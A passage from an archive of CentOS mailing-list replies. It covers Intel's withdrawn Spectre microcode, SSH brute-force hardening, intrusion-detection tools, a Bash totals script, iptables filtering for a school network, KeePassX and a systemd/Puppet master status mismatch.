they're recommending not doing in this doc, it's that badly written.
You have to infer, by reading two prior docs, that they're referring
to microcode. And then you have to assume that's still what they're
referring to when they say:

"We recommend that OEMs, cloud service providers, system
manufacturers, software vendors and end users stop deployment of
current versions."  Current versions of what? Microcode?

But yes, indeed they appear to have pulled the 20180108 microcode,
which was previously set to latest at this link, and it is now
reverted to the 20171117 microcode.

https://downloadcenter.intel.com/download/27337/Linux-Processor-Microcode-Data-File?v=t

What these means for people who have CPUs which were not crashing
(rebooting being a new euphemism for crashing) , but saw variant 2
Spectre mitigation with the 20180108 microcode, will lose full
mitigation until Intel gets its ducks into a row.


*eye roll*



> Linus Torvalds agrees:
> http://tcrn.ch/2n2mEcA

His comments aren't about microcode though. And it also looks like he
got IBRS and IBPB confused. The better post on this front is

https://lkml.org/lkml/2018/1/22/598

As far as I know, there still is no mitigation for Spectre variant 1.



-- 
Chris Murphy
___
CentOS mailing list
CentOS@centos.org
https://lists.centos.org/mailman/listinfo/centos
___
CentOS mailing list
CentOS@centos.org
https://lists.centos.org/mailman/listinfo/centos

Re: [CentOS] 1600x900 not available

[Leroy Tennison]

I run KDE too, if you find out how then please post, thanks.

- Original Message -
From: "m roth" 
To: "centos" 
Sent: Thursday, January 11, 2018 2:15:18 PM
Subject: Re: [CentOS] 1600x900 not available

Sean Smith wrote:
>
> On 01/11/2018 12:34 PM, m.r...@5-cent.us wrote:
>> Sean Smith wrote:
>> 
>>> setting my resolution to 1600x900 is a cheesy, yet effective, way to do
>>> get what I need.
>>>
>>> ...Now if I can just get my touchpad to FRICK'N disable while typing.
>>>
>> If/when you do, *PLEASE* post the solution. If you're a manager, or
>> gamer, I guess touchpads are great. If you're *typing*, they're dreadful,
>> that's where the ball of my thumb goes.
>
> Okay, got the "disable touchpad while typing" thingy working.
>
> Here's what I did:
>
> Install dconf-editor if you haven't already.
>
> Then, from a console (not as su), run:
>
> dconf write /org/gnome/desktop/peripherals/touchpad/disable-while-typing
> true
>
> This seems to have worked for me.
>
I usually run kde, so I'll have to look for something similar. Thanks,
though.

  mark

___
CentOS mailing list
CentOS@centos.org
https://lists.centos.org/mailman/listinfo/centos
___
CentOS mailing list
CentOS@centos.org
https://lists.centos.org/mailman/listinfo/centos

Re: [CentOS] Failed attempts

[Leroy Tennison]

And if you're really security conscious consider using port knocking (knock 
server - amazingly easy to set up. Or use fwknop, a little more difficult to 
set up but not much.  Finally, for the hard core who really like pain - write 
the iptables rules yourself).

- Original Message -
From: "Pete Biggs" 
To: "centos" 
Sent: Monday, November 27, 2017 11:53:30 AM
Subject: Re: [CentOS] Failed attempts

On Mon, 2017-11-27 at 12:10 -0500, Jerry Geis wrote:
> hi All,
> 
> I happened to login to one of my servers today and saw 96000 failed login
> attempts. shown below is the address its coming from. I added it to my
> firewall to drop.
> 
> Failed password for root from 123.183.209.135 port 14299 ssh2
> 
> FYI - others might be seeing it also.
> 

As others have said, it's normal: dictionary based brute forcing of
root; and no surprise that that IP is based in China. Welcome to the
Internet.

Primarily you need to make sure your root password is strong so it
isn't vulnerable to this sort of attack. If it is, then the most nasty
thing about this sort of thing is that your logs fill up.

For your sanity then you can do the following:

  - disallow ssh root logins by password (login as an unprivileged user
 or use keys)

  - run something like fail2ban which will block a host for a
predetermined amount of time after a number of failures.  

  - don't run ssh on 22, use a different port.  (Things get a lot
quieter when you do that, but it comes with it's own problems and don't
get complacent because someone will find the port eventually.)

  - if you only have a limited number of hosts or subnets logging in to
your machine, adjust the firewall so that only they are allowed
through.

P.


___
CentOS mailing list
CentOS@centos.org
https://lists.centos.org/mailman/listinfo/centos
___
CentOS mailing list
CentOS@centos.org
https://lists.centos.org/mailman/listinfo/centos

Re: [CentOS] How to detect botnet user on the server ?

[Leroy Tennison]

Another alternative is to use a FIMS/HIDS such as Aide (Advanced Intrusion 
Detection Environment), OSSEC or Samhain.  Be prepared to learn a lot about 
what your OS normally does behind the scenes (and thus a fair amount of initial 
fine tuning to exclude those things).  Aide seems to work well (I've seen only 
one odd result) and is quite granular.  However, it is local system based 
rather than centralized and isn't daemon based so you're left with periodic 
checks and finding a way to protect the executable, database and configuration. 
 OSSEC is centralized, daemon based and can check logs for anomalies.  However, 
it is not nearly as granular as Aide and does produce false positives (for 
example, if 'detect new files' is used, it will detect based on access time 
changes rather than modification or change times - but only for a while...).  
If you select OSSEC, whatever you do, do NOT put extraneous files in 
/var/ossec/etc/shared - you can get truly bizarre and baffling results doing so.
   I only know about Samhain, if someone has experience I would very much like 
to hear about it's strengths and weaknesses.

- Original Message -
From: "Johnny Hughes" 
To: "centos" 
Sent: Monday, November 6, 2017 7:20:22 AM
Subject: Re: [CentOS] How to detect botnet user on the server ?

On 11/06/2017 07:06 AM, marcos valentine wrote:
> Hello guys,
> 
> 
> Whats is the best way to identify a possible user using a botnet with php
> in the server? And if he is using GET commands for example in other server.
> 
> Does apache logs outbound conections ?
> 
> If it is using a file that is not malicious the clam av would not identify.

This sounds like a good place to start:

https://major.io/2011/03/09/strategies-for-detecting-a-compromised-linux-server/

(look for open ports connections both inbound and outbound with netstat,
etc.)

But, if someone has completely breached the machine and gotten root on
it, they could put in fake binaries that hide ports and hide processes
from 'top' (or ps, lsof).  So, a look via chkrootkit or rkhunter would
be needed to find that.

The link for rkhunter in the article is bad .. here is the new one:

http://rkhunter.sourceforge.net/

rkhunter seems to be in EPEL.  chkrootkit is in fedora, it does not seem
to be in EPEL.


___
CentOS mailing list
CentOS@centos.org
https://lists.centos.org/mailman/listinfo/centos
___
CentOS mailing list
CentOS@centos.org
https://lists.centos.org/mailman/listinfo/centos

Re: [CentOS] modestly priced laptop for C7

[Leroy Tennison]

And I agree too, running Kubuntu 14.04 LTS on an HP Pavilion dv7 is acceptable, 
running Windows 7 was dog slow - hard drive crashed and we lost the Windoze 
license, sad story, all I could do was install Linux and go on instead of 
dual-booting when I needed Windoze - such a shame :-) :-) :-)

- Original Message -
From: "Yves Bellefeuille" 
To: "centos" 
Sent: Thursday, November 2, 2017 2:41:03 PM
Subject: Re: [CentOS] modestly priced laptop for C7

Valeri Galtsev  wrote:

>  And you are talking about 8 years old system on what would be called
>  decent hardware about the same 8 years back, right?

The hardware is 6 years old and, at the time, Tech Report called it
"the best netbook we've ever tested". So it was quite good (for a
netbook) at the time.

Everything depends on the OP's intended use, of course. I just wanted
to disagree that you need better hardware for Linux than for Windows,
or at least for CentOS 6 than Windows 7.

-- 
Yves Bellefeuille


___
CentOS mailing list
CentOS@centos.org
https://lists.centos.org/mailman/listinfo/centos
___
CentOS mailing list
CentOS@centos.org
https://lists.centos.org/mailman/listinfo/centos

Re: [CentOS] low end file server with h/w RAID - recommendations

[Leroy Tennison]

Good to know about the HPE and Dell "gotchas", thanks to those who posted.

I can speak to SuperMicro (11 systems, mostly X9 and X10).  Hardware seems to 
be fine, management utilities (IPMI - like iLO) are more basic.  The real 
heartburn right now is that the browsers for Linux have pretty much dropped 
NPAPI which means remote console doesn't work since it needs Java.  They have 
alternatives on their web site (look for IPMIView and IPMICFG).  One of their 
solutions only works with Gnome (but I don't remember which one - too long 
ago).  Differing versions of IPMI firmware have their own quirks.  Bottom line: 
support is there but more basic and not as easy to use.

- Original Message -
From: "Richard Zimmerman" 
To: "centos" 
Sent: Thursday, November 2, 2017 8:33:17 AM
Subject: Re: [CentOS] low end file server with h/w RAID - recommendations

I just put a call into AT Office 365 asking them to explain the spoof warning 
thing...

To answer your question

At the moment, no I can't. I like HPE stuff, we bought a DL380 gen9 say five 
months ago and totally happy with it. In fairness, its running Server 2012 r2 
too but I didn't run into the hardware gotchas I did on the other stuff. It 
just seems HPE skimped on their lower end stuff and CentOS 6.x doesn't play 
well. 

This whole incident with the DL20 JUST happened. It's (finally) been spinning 
Server 2012 r2 for about a week now. It was a long 5 week process just to get 
to to this answer.

I haven't had the time to research out what my next buys are going to be. I'm 
listening as well if someone has a suggestion.

Honestly, I'm leaning against Dell because their stuff just doesn't seem to be 
built to last. We have 1 T620, 2 R620 servers. So far just past the 5 year 
mark, 3 dead hard drives, 2 power supplies. That is with the machines mostly 
TURNED OFF. (Failed IT project after I was hired; aborted a move to a new ERP 
system) With my personal Dell laptop just bought 4 months ago, periodically get 
the 6 beep on power on error. Tells me Dell quality / quality control might not 
be where it needs to be. 

Then again, I get a constant flow of HPE advisories. :(

I've thinking of taking a look at Supermicro severs. 

Bottom line is, they all have their quirks, problems, deficiencies

WHY did Lenovo have to quit selling the RS140's? I *LOVE* those machines 
Fast, reliable and just work GREAT with Centos 6.9!

Regards,

Richard


-Original Message-
From: CentOS [mailto:centos-boun...@centos.org] On Behalf Of hw
Sent: Thursday, November 2, 2017 9:09 AM
To: centos@centos.org
Subject: Re: [CentOS] low end file server with h/w RAID - recommendations

Richard Zimmerman wrote:
> DO NOT buy the newer HPE DL20 gen9 or ML10 gen9 servers then (especially if 
> using CentOS 6.x)

What would you suggest as alternative, something from Dell?
___
CentOS mailing list
CentOS@centos.org
https://lists.centos.org/mailman/listinfo/centos
___
CentOS mailing list
CentOS@centos.org
https://lists.centos.org/mailman/listinfo/centos
___
CentOS mailing list
CentOS@centos.org
https://lists.centos.org/mailman/listinfo/centos

Re: [CentOS] [OT] Bash help

[Leroy Tennison]

Not enough experience with the mainframe: I meant WinDoze.

- Original Message -
From: "m roth" <m.r...@5-cent.us>
To: "centos" <centos@centos.org>
Sent: Wednesday, October 25, 2017 1:02:54 PM
Subject: Re: [CentOS] [OT] Bash help

Leroy Tennison wrote:
> No kidding, but in that "other OS" the answer to the question "how can I
> create that report" is usually "You can't unless you spend money for a
> third-party application".
>
"Other", singluar? Did you mean WinDoze, or on an IBM mainframe, or...?

 mark "been around the block"

> - Original Message -
> From: "m roth" <m.r...@5-cent.us>
> To: "centos" <centos@centos.org>
> Sent: Wednesday, October 25, 2017 12:27:28 PM
> Subject: Re: [CentOS] [OT] Bash help
>
> Warren Young wrote:
>> On Oct 25, 2017, at 11:00 AM, Leroy Tennison <le...@datavoiceint.com>
>> wrote:
>>>
>>> Although "not my question", thanks, I learned a lot about array
>>> processing from your example.
>>
>> Yeah, it’s amazing how many obscure corners of the Bash language must be
>> tapped to solve such a simple problem.  I count 7 features in that
>> script
>> that I almost never use, because I’d have just written this one in Perl
>> if
>> not required to write it in Bash by the OP.
> 
> Let me say this: among the many reasons I like *Nix: in any other o/s,
> it's "how co I create this report, and it takes from 2 days to 2 weeks. In
> *Nix, it's "of all the ways I can create this report, how would I *prefer*
> to do it"
>
> ___
> CentOS mailing list
> CentOS@centos.org
> https://lists.centos.org/mailman/listinfo/centos
> ___
> CentOS mailing list
> CentOS@centos.org
> https://lists.centos.org/mailman/listinfo/centos
>


___
CentOS mailing list
CentOS@centos.org
https://lists.centos.org/mailman/listinfo/centos
___
CentOS mailing list
CentOS@centos.org
https://lists.centos.org/mailman/listinfo/centos

Re: [CentOS] [OT] Bash help

[Leroy Tennison]

No kidding, but in that "other OS" the answer to the question "how can I create 
that report" is usually "You can't unless you spend money for a third-party 
application".

- Original Message -
From: "m roth" <m.r...@5-cent.us>
To: "centos" <centos@centos.org>
Sent: Wednesday, October 25, 2017 12:27:28 PM
Subject: Re: [CentOS] [OT] Bash help

Warren Young wrote:
> On Oct 25, 2017, at 11:00 AM, Leroy Tennison <le...@datavoiceint.com>
> wrote:
>>
>> Although "not my question", thanks, I learned a lot about array
>> processing from your example.
>
> Yeah, it’s amazing how many obscure corners of the Bash language must be
> tapped to solve such a simple problem.  I count 7 features in that script
> that I almost never use, because I’d have just written this one in Perl if
> not required to write it in Bash by the OP.

Let me say this: among the many reasons I like *Nix: in any other o/s,
it's "how co I create this report, and it takes from 2 days to 2 weeks. In
*Nix, it's "of all the ways I can create this report, how would I *prefer*
to do it"

___
CentOS mailing list
CentOS@centos.org
https://lists.centos.org/mailman/listinfo/centos
___
CentOS mailing list
CentOS@centos.org
https://lists.centos.org/mailman/listinfo/centos

Re: [CentOS] [OT] Bash help

[Leroy Tennison]

Although "not my question", thanks, I learned a lot about array processing from 
your example.

- Original Message -
From: "warren" 
To: "centos" 
Sent: Wednesday, October 25, 2017 11:47:12 AM
Subject: Re: [CentOS] [OT] Bash help

On Oct 25, 2017, at 10:02 AM, Mark Haney  wrote:
> 
> I have a file with two columns 'email' and 'total' like this:
> 
> m...@example.com 20
> m...@example.com 40
> y...@domain.com 100
> y...@domain.com 30
> 
> I need to get the total number of messages for each email address.

This screams out for associative arrays.  (Also called hashes, dictionaries, 
maps, etc.)

That does limit you to CentOS 7+, or maybe 6+, as I recall.  CentOS 5 is 
definitely out, as that ships Bash 3, which lacks this feature.


#!/bin/bash
declare -A totals

while read line
do
IFS="\t " read -r -a elems <<< "$line"
email=${elems[0]}
subtotal=${elems[1]}

declare -i n=${totals[$email]}
n=n+$subtotal
totals[$email]=$n
done < stats

for k in "${!totals[@]}"
do
printf "%6d  %s\n" ${totals[$k]} $k
done


You’re making things hard on yourself by insisting on Bash, by the way.  This 
solution is better expressed in Perl, Python, Ruby, Lua, JavaScript…probably 
dozens of languages.
___
CentOS mailing list
CentOS@centos.org
https://lists.centos.org/mailman/listinfo/centos
___
CentOS mailing list
CentOS@centos.org
https://lists.centos.org/mailman/listinfo/centos

Re: [CentOS] how to prevent files and directories from being deleted?

[Leroy Tennison]

chattr is a valuable but lesser-known tool, if you use it then document it 
somehow so other admins don't stumble over it.

- Original Message -
From: "hw" 
To: "centos" 
Sent: Tuesday, October 3, 2017 12:04:14 PM
Subject: Re: [CentOS] how to prevent files and directories from being   deleted?

marcos valentine  writes:

> You can try chattr?
>
> https://en.wikipedia.org/wiki/Chattr

Wow, I never needed/used that.  Being able to make files undeletable
might be a very useful thing ...


-- 
"Didn't work" is an error.
___
CentOS mailing list
CentOS@centos.org
https://lists.centos.org/mailman/listinfo/centos
___
CentOS mailing list
CentOS@centos.org
https://lists.centos.org/mailman/listinfo/centos

Re: [CentOS] Display IP addresses on the system console *before* the login prompt.

[Leroy Tennison]

What does 'man agetty' (or whatever you're using) on the OS in question say?

Ubuntu 14.04 doesn't list "\4{}" as an option and it doesn't work, 16.04 
does and it does appear there (might have to press Enter to get a screen 
refresh).

If the OS doesn't support it then you'll have to get creative (send 'ip addr' 
output to /etc/issue at boot or periodically) to get what you want.

- Original Message -
From: "Arun Khan" 
To: "centos" 
Sent: Monday, October 2, 2017 3:03:00 PM
Subject: [CentOS] Display IP addresses on the system console *before* the   
 login prompt.

I have a bunch of VBox Linux VMs (CentOS 6/7, Debian7/8/9, Ubuntu
(14.0/16.04, Alpine) that get dynamic IPs.  To get their respecitive
IP addresses I have to login and run 'ip addr'

I would like such info to be displayed on the VM console *before* the
login prompt.  Ideally an ASCII log + info (see below sig line).
Thus, I can get the info from the VM console without having to login.

I read up on /etc/issue but adding "\4{eth0}" to the existing string
does not work.

TIA for solutions/pointers

-- Arun Khan



 _               _
| |__   ___  ___| |_ _ __   __ _ _ __ ___   ___
| '_ \ / _ \/ __| __| '_ \ / _` | '_ ` _ \ / _ \
| | | | (_) \__ \ |_| | | | (_| | | | | | |  __/
|_| |_|\___/|___/\__|_| |_|\__,_|_| |_| |_|\___|

lo: 127.0.0.1
eth0: 10.1.1.122
kernel: 4.10.0-33-generic x86_64

login:


___
CentOS mailing list
CentOS@centos.org
https://lists.centos.org/mailman/listinfo/centos
___
CentOS mailing list
CentOS@centos.org
https://lists.centos.org/mailman/listinfo/centos

Re: [CentOS] prevent users from fiddling with network?

[Leroy Tennison]

As Scott said, nothing is perfect.  On Ubuntu (16.04 - the current long term 
support version) all home directories are world executable/readable ("Security? 
 What's that?").

- Original Message -
From: "Scott Robbins" 
To: "centos" 
Sent: Thursday, September 21, 2017 9:40:03 PM
Subject: Re: [CentOS] prevent users from fiddling with network?

On Thu, Sep 21, 2017 at 07:00:12PM -0500, Valeri Galtsev wrote:
> 
> On Thu, September 21, 2017 6:13 pm, Scott Robbins wrote:
> > On Thu, Sep 21, 2017 at 05:23:23PM -0500, Valeri Galtsev wrote:
> >>
> >
> > Well, this is my longstanding rant against RedHat and friends.  Take a
> > look
> > at what Fedora is doing before blithely throwing it into RedHat.
> >>
> > Most Fedora stuff is for single user laptops, and frankly, a lot of it
> > seems developed by people with no concept of system administration.

> Well, I guess we see Microsoft money invested into ("donated" to? ;-)
> RedHat at work. Yes, my servers are FreeBSD for long time already, but as
> we have to use Linux for wide variety of stuff, we may need to start
> looking which other distribution (better from sysadmin's prospective) to
> flee to. Scott, I'd be glad to hear your advise on that matter. (As CentOS
> public mirror maintainer I will keep maintaining that indefinitely as a
> token of gratitude to the project that gave us so much over long time).

Unfortunately, no advice.  I haven't used Debian as anything but a laptop
install for a long time, but their developers did, in the past, seem to
have better ideas of system administration. They have their own issues, of
course, nothing is perfect.


-- 
Scott Robbins
PGP keyID EB3467D6
( 1B48 077D 66F6 9DB0 FDC2 A409 FA54 EB34 67D6 )
gpg --keyserver pgp.mit.edu --recv-keys EB3467D6

___
CentOS mailing list
CentOS@centos.org
https://lists.centos.org/mailman/listinfo/centos
___
CentOS mailing list
CentOS@centos.org
https://lists.centos.org/mailman/listinfo/centos

Re: [CentOS] Block internet access for some users on the LAN ?

[Leroy Tennison]

While I agree with all this, keep in mind this is a school and the proposed 
solution may not be feasible financially or realistically (Can a student in the 
computer lab unplug an Ethernet connection and plug their device in?  Are the 
teachers systems in the same room as students?)  If it's not then some lesser 
desirable but "better than nothing" solutions would be to get rid of DHCP and 
assign all static IPs (with just 80 systems this is possible though not 
desirable), change those IP ranges to just enough to meet the need for the 
specified systems and allow only IP addresses with a need for Internet access 
through the firewall.  Is monitoring for defined system's IP addresses going 
offline possible?  A good analysis of needs may surface options.  Do the 
teachers need Internet access during school hours (it is possible via cron to 
have time-based firewall rules).  What about the computer lab?  Without knowing 
the specifics these questions are unanswerable.  And we have to keep in mind 
"relative security" - if they have an "evil genius" student on their hands 
there will be a way around the best security which can be put in place.

- Original Message -
From: "Johnny Hughes" 
To: "centos" 
Sent: Monday, September 18, 2017 12:42:34 PM
Subject: Re: [CentOS] Block internet access for some users on the LAN ?

On 09/18/2017 12:23 PM, John R Pierce wrote:
> On 9/18/2017 10:03 AM, Nicolas Kovacs wrote:
>> This year the school's director wants to completely block Internet
>> access for all the student's personal devices.
> 
> MAC addresses can easily be forged, IP addresses can easily be changed,
> none of that is secure if its on the same network segment
> 
> The student's personal devices should be on a completely different
> 'guest' subnet, enforced by the wireless infrastructure, via use of a
> captive portal and/or WPA2-EAP authentication.     Presumably most of
> the schools infrastructure is on ethernet?  those ethernet connections
> should be kept physically secure so noone unauthorized can plug/unplug
> anything into the ethernet.
> 
> THEN you'd use iptables to enforce access restrictions on this guest
> subnet.
> 
> 

It would be extremely easy to, for example, try to get to the internet
and fail .. look at my IP address and get my default gateway from my
device (that I own) .. then try manually other network addresses until I
find one that works (with the same gateway).  That is, I can easily find
the others segments (like the printers) and take a free address in that
segment.  Since the whole network is flat, It will let me out then.

As John says .. if you want to isolate guest accounts, do it with a
completely different network segment that is isolated from things you
don't want them to access.  You can then setup rules unique to that
network segment that they can't forge (the gateway is the only way that
segment can get out and all the rules are the same for any IP that will
route from that segment).


___
CentOS mailing list
CentOS@centos.org
https://lists.centos.org/mailman/listinfo/centos
___
CentOS mailing list
CentOS@centos.org
https://lists.centos.org/mailman/listinfo/centos

Re: [CentOS] Block internet access for some users on the LAN ?

[Leroy Tennison]

Iptables is a very reasonable way to do it, basically you decide what devices 
should have Internet access, create accept rules for them and then have a 
default deny for everything else.

- Original Message -
From: "Nicolas Kovacs" 
To: "centos" 
Sent: Monday, September 18, 2017 12:03:56 PM
Subject: [CentOS] Block internet access for some users on the LAN ?

Hi,

In our local school we have two servers and roughly 80 clients. The
network is 192.168.10.0/255.255.255.0, and DHCP+DNS is managed by Dnsmasq.

School PCs (teachers and management) are registered via MAC address and
get an IP address in a specific range:

192.168.10.2 - 192.168.10.50 - management + teachers

192.168.10.201 - 192.168.10.220 - computer room

192.168.10.246 - 192.168.10.247 - printers

192.168.10.251 - 192.168.10.253 - wireless access points

If a client (like a student's laptop, tablet or smartphone) is not
registered, it gets an IP address in the range between 192.168.10.100
and 192.168.10.200.

Up until recently I've been using a combination of Squid and Squidguard
to filter Internet access.

This year the school's director wants to completely block Internet
access for all the student's personal devices.

The Linux server acts as a transparent gateway. Unfortunately with Squid
I can only filter/block HTTP connections, but not HTTPS (well, I could,
but this is way too complicated to setup).

The firewall is managed by a simple Iptables script. Now I *think* the
easiest way to block a certain IP range from Internet access would be
through Iptables (correct me if I'm wrong). If this is the case, what
would that look like?

Any suggestions?

Niki Kovacs

-- 
Microlinux - Solutions informatiques durables
7, place de l'église - 30730 Montpezat
Web  : http://www.microlinux.fr
Mail : i...@microlinux.fr
Tél. : 04 66 63 10 32
___
CentOS mailing list
CentOS@centos.org
https://lists.centos.org/mailman/listinfo/centos
___
CentOS mailing list
CentOS@centos.org
https://lists.centos.org/mailman/listinfo/centos

Re: [CentOS] KeePassX replacement

[Leroy Tennison]

keepassx.org shows the latest release as October 2016 (and the main page shows 
"2005-2017" so someone is updating it), if I found the right keepass 2 
(keepass.info) it was updated in June 2017.  I do remember receiving a security 
alert to upgrade keepassx (since I use it) quite some time back (but not years 
ago).

- Original Message -
From: "Valeri Galtsev" 
To: "centos" 
Sent: Monday, September 18, 2017 10:54:05 AM
Subject: Re: [CentOS] KeePassX replacement

On Sat, September 16, 2017 1:45 pm, Yves Bellefeuille wrote:
> H  wrote:
>
>> I have been using the KeePassX password manager on CentOS 6 and 7 for
>> some time and it works pretty well. On my Windows machine I use
>> KeePass which offers a number of features missing from KeePassX, I
>> also sync the database between several machines, including Android
>> units where I use keepass2android. Database compatibility is thus
>> required.
>
> Are you aware that KeePass 2 works under Linux, with mono? There are
> also ports for Android, but I've never tried them.
>
> You may have reasons to prefer KeePassX over KeePass 2, though.

I for one use keepassx. My password database is synchronized between
variety of systems, and I can view/edit it on: CentOS, FreeBSD, MS
Windows, Android (and should be able on any derivatives of those). I
didn't try iOS as currently I don't have a need in that.

Incidentally, does anybody know if there is any necessity in keepassx to
be patched? Did I read the original post correctly: there is no activity
on the development site for long time? Should there be any? (As, I would
say for comparison: cvs is so established software that there is no
development to expect, only if there are any security holes found those
need to be patched). Any insight on KeePassX anybody?

Valeri

>
> --
> Yves Bellefeuille
> 
>
> ___
> CentOS mailing list
> CentOS@centos.org
> https://lists.centos.org/mailman/listinfo/centos
>



Valeri Galtsev
Sr System Administrator
Department of Astronomy and Astrophysics
Kavli Institute for Cosmological Physics
University of Chicago
Phone: 773-702-4247

___
CentOS mailing list
CentOS@centos.org
https://lists.centos.org/mailman/listinfo/centos
___
CentOS mailing list
CentOS@centos.org
https://lists.centos.org/mailman/listinfo/centos

Re: [CentOS] Syncronize systemctl status with reality?

[Leroy Tennison]

Hmmm, that's an interesting option, I'll have to look into it.

- Original Message -
From: "Alexander Dalloz" <ad+li...@uni-x.org>
To: "centos" <centos@centos.org>
Sent: Tuesday, August 29, 2017 4:17:37 PM
Subject: Re: [CentOS] Syncronize systemctl status with reality?

Am 29.08.2017 um 22:52 schrieb Leroy Tennison:
> The AppPreloader is doing things (and probably confusing systemd in the 
> process) but I didn't start that, it was a part of the reboot.  I looked at 
> /etc/init.d/puppetmaster to see if something strange was being done and it 
> was one of the simpler init scripts I've seen, uses start-stop-daemon.
> 
> I don't have any control over this, 'systemctl list-unit-files | grep puppet' 
> shows the puppetmaster.service is enabled, I just need a "cleanup" solution, 
> any ideas?  And, BTW, thanks for any feedback.

Remove the Rack Puppet master server.

https://docs.puppet.com/puppet/5.1/passenger.html#install-the-puppet-master-rack-application

Alexander
___
CentOS mailing list
CentOS@centos.org
https://lists.centos.org/mailman/listinfo/centos
___
CentOS mailing list
CentOS@centos.org
https://lists.centos.org/mailman/listinfo/centos

Re: [CentOS] Syncronize systemctl status with reality?

[Leroy Tennison]

- Original Message -
From: "James Hogarth" <james.hoga...@gmail.com>
To: "centos" <centos@centos.org>
Sent: Tuesday, August 29, 2017 2:03:44 PM
Subject: Re: [CentOS] Syncronize systemctl status with reality?

On 29 Aug 2017 17:58, "Leroy Tennison" <le...@datavoiceint.com> wrote:

The particular issue is with puppetmaster (which admittedly takes 4 minutes
to actually start, setting TimeoutStartSec=300 in it's unit file stopped
the false timeout report) but I have seen it one other time (don't remember
the details).

systemctl status puppetmaster
● puppetmaster.service - Puppet master
Loaded: loaded (/lib/systemd/system/puppetmaster.service; enabled; vendor
preset: enabled)
Active: failed (Result: resources) since Tue 2017-08-29 11:24:36 CDT; 22min
ago
Process: 897 ExecStart=/usr/bin/puppet master (code=exited,
status=0/SUCCESS)

Aug 29 11:22:39 puppetmaster02 systemd[1]: Starting Puppet master...
Aug 29 11:24:36 puppetmaster02 puppet-master[1233]: Reopening log files
Aug 29 11:24:36 puppetmaster02 puppet-master[1233]: Starting Puppet master
version 3.8.5
Aug 29 11:24:36 puppetmaster02 puppet-master[1233]: Could not run: Address
already in use - listen(2)
Aug 29 11:24:36 puppetmaster02 systemd[1]: puppetmaster.service: PID 1233
read from file /run/puppet/master.pid does not exist or is a zombie.
Aug 29 11:24:36 puppetmaster02 systemd[1]: Failed to start Puppet master.
Aug 29 11:24:36 puppetmaster02 systemd[1]: puppetmaster.service: Unit
entered failed state.
Aug 29 11:24:36 puppetmaster02 systemd[1]: puppetmaster.service: Failed
with result 'resources'.

However, ps -ef | grep puppet (run just after the above) returns
puppet 1380 1 0 11:26 ? 00:00:08 Passenger RubyApp: /usr/share/puppet/rack/
puppetmasterd
root 2015 1341 0 11:48 pts/0 00:00:00 grep --color=auto puppet

Earlier ps .. also reported
puppet 1355 1166 3 11:26 ? 00:00:01 Passenger AppPreloader:
/usr/share/puppet/rack/puppetmasterd

And, the "bottom line", puppet agent -t on a client works. It reports
finishing the catalog run and the client's yaml files on puppetmaster are
up to date.

Is there a command to tell systemd to re-scan running state and update its
understanding on what it finds? I tried systemctl daemon-reload just to be
sure that didn't solve the problem before posting this.
___
CentOS mailing list
CentOS@centos.org
https://lists.centos.org/mailman/listinfo/centos


First glance ity looks like someone has started that puppetmaster manually
at some point. As such it's not in a cgroup systemd is tracking so it isn't
aware of it.

Your attempts to start the service are failing because that manually
started instance already has the port open.

Kill it with pkill -f puppet and then use ss -tnp to check for the port
being freed (wait for any time_wait states to go... which is why I'm not
filtering by listen).

Once it's clear then try starting with systemctl
___
CentOS mailing list
CentOS@centos.org
https://lists.centos.org/mailman/listinfo/centos

OK, something weird is definitely going on here, I have the luxury of rebooting 
this system so it did.  Here's what I got, note the time stamps.

ps -ef | grep puppet
root   932 1  0 15:23 ?00:00:00 /usr/bin/ruby /usr/bin/puppet 
master
root  1343  1327  0 15:24 pts/000:00:00 grep --color=auto puppet
(immediately afterward as fast as I could type:) uptime
 15:24:56 up 1 min,  1 user,  load average: 0.16, 0.07, 0.02
systemctl status puppetmaster
● puppetmaster.service - Puppet master
   Loaded: loaded (/lib/systemd/system/puppetmaster.service; enabled; vendor 
preset: enabled)
   Active: activating (start) since Tue 2017-08-29 15:23:44 CDT; 1min 24s ago
  Control: 932 (puppet)
Tasks: 1
   Memory: 2.4M
  CPU: 4ms
   CGroup: /system.slice/puppetmaster.service
   └─932 /usr/bin/ruby /usr/bin/puppet master

Aug 29 15:23:44 puppetmaster02 systemd[1]: Starting Puppet master...



After a short delay:
systemctl status puppetmaster
● puppetmaster.service - Puppet master
   Loaded: loaded (/lib/systemd/system/puppetmaster.service; enabled; vendor 
preset: enabled)
   Active: failed (Result: resources) since Tue 2017-08-29 15:25:11 CDT; 11s ago
  Process: 932 ExecStart=/usr/bin/puppet master (code=exited, status=0/SUCCESS)

Aug 29 15:23:44 puppetmaster02 systemd[1]: Starting Puppet master...
Aug 29 15:25:11 puppetmaster02 puppet-master[1360]: Reopening log files
Aug 29 15:25:11 puppetmaster02 puppet-master[1360]: Starting Puppet master 
version 3.8.5
Aug 29 15:25:11 puppetmaster02 puppet-master[1360]: Could not run: Address 
already in use - listen(2)
Aug 29 15:25:11 puppetmaster02 systemd[1]: puppetmaster.service: PID 1360 read 
from file /run/puppet/master.pid does not exist or is a zombie.
Aug 29 15:25:11 puppetmaster02 systemd[1]: Failed to start Puppet master.
Aug 29 15:25:11 puppetmaster02 systemd[1]: puppetm

[CentOS] Syncronize systemctl status with reality?

[Leroy Tennison]

The particular issue is with puppetmaster (which admittedly takes 4 minutes to 
actually start, setting TimeoutStartSec=300 in it's unit file stopped the false 
timeout report) but I have seen it one other time (don't remember the details). 

systemctl status puppetmaster 
● puppetmaster.service - Puppet master 
Loaded: loaded (/lib/systemd/system/puppetmaster.service; enabled; vendor 
preset: enabled) 
Active: failed (Result: resources) since Tue 2017-08-29 11:24:36 CDT; 22min ago 
Process: 897 ExecStart=/usr/bin/puppet master (code=exited, status=0/SUCCESS) 

Aug 29 11:22:39 puppetmaster02 systemd[1]: Starting Puppet master... 
Aug 29 11:24:36 puppetmaster02 puppet-master[1233]: Reopening log files 
Aug 29 11:24:36 puppetmaster02 puppet-master[1233]: Starting Puppet master 
version 3.8.5 
Aug 29 11:24:36 puppetmaster02 puppet-master[1233]: Could not run: Address 
already in use - listen(2) 
Aug 29 11:24:36 puppetmaster02 systemd[1]: puppetmaster.service: PID 1233 read 
from file /run/puppet/master.pid does not exist or is a zombie. 
Aug 29 11:24:36 puppetmaster02 systemd[1]: Failed to start Puppet master. 
Aug 29 11:24:36 puppetmaster02 systemd[1]: puppetmaster.service: Unit entered 
failed state. 
Aug 29 11:24:36 puppetmaster02 systemd[1]: puppetmaster.service: Failed with 
result 'resources'. 

However, ps -ef | grep puppet (run just after the above) returns 
puppet 1380 1 0 11:26 ? 00:00:08 Passenger RubyApp: 
/usr/share/puppet/rack/puppetmasterd 
